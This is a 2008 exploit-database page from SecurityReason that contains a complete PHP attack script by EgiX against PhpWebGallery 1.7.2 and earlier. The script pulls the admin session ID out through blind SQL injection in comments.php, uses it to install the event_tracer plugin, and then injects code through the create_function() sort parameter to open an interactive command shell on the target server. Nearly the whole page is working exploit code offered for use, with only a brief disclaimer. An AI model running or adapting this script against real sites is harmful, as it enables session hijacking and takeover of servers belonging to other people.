|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 4910 SecurityAlert : 4456 (Exploit Details) Milw0rm ID : 6755 Credit : EgiX Date : 15.10.2008 Exploit Code : <?php /* ------------------------------------------------------------------------ PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit ------------------------------------------------------------------------ author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.phpwebgallery.net/ details..: works with at least two rows in _comments table This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /plugins/event_tracer/event_list.php 60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1; 61. usort( 62. $events, 63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' ) 64. ); An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can access to the plugins management interface, but the attacker might be able to retrieve a valid admin session id using the SQL injection bug in comments.php (see lines 325-340) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout",5); define(STDIN, fopen("php://stdin", "r")); define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/"); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again...\n"; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function check_target() { global $host, $path, $prefix, $default_record; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); $prefix = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); $default_record = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n"); } function encodeSQL($sql) { for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); return "CONCAT(0x{$encoded})"; } function get_sid() { global $host, $path, $prefix, $default_record; $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z $index = 1; $sid = ""; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id=".md5("foo")."\r\n"; $packet .= "Connection: close\r\n\r\n"; print "\n[-] Fetching admin SID: "; while (!strpos($sid, chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die("\n\n[-] Exploit failed...try later!\n"); $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM /**/{$prefix}sessions". "/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/** /1)/**/LIMIT/**/1/*"; preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print "\n"; return $sid; } function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Connection: close\r\n\r\n"; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } } "\n+----------------------------------------------------------------------- ----+"; print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; "\n+----------------------------------------------------------------------- ----+\n"; if ($argc < 3) { print "\nUsage...: php $argv[0] host path [sid]\n"; print "\nhost....: target server (ip/hostname)"; print "\npath....: path to PhpWebGallery directory"; print "\nsid.....: a valid admin session id\n"; die(); } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = (isset($argv[3])) ? $argv[3] : get_sid(); check_plugin(); $code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP _CMD]));die;%%23"; $packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$cod e} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nphpwebgallery-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n"); } else break; } ?> Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |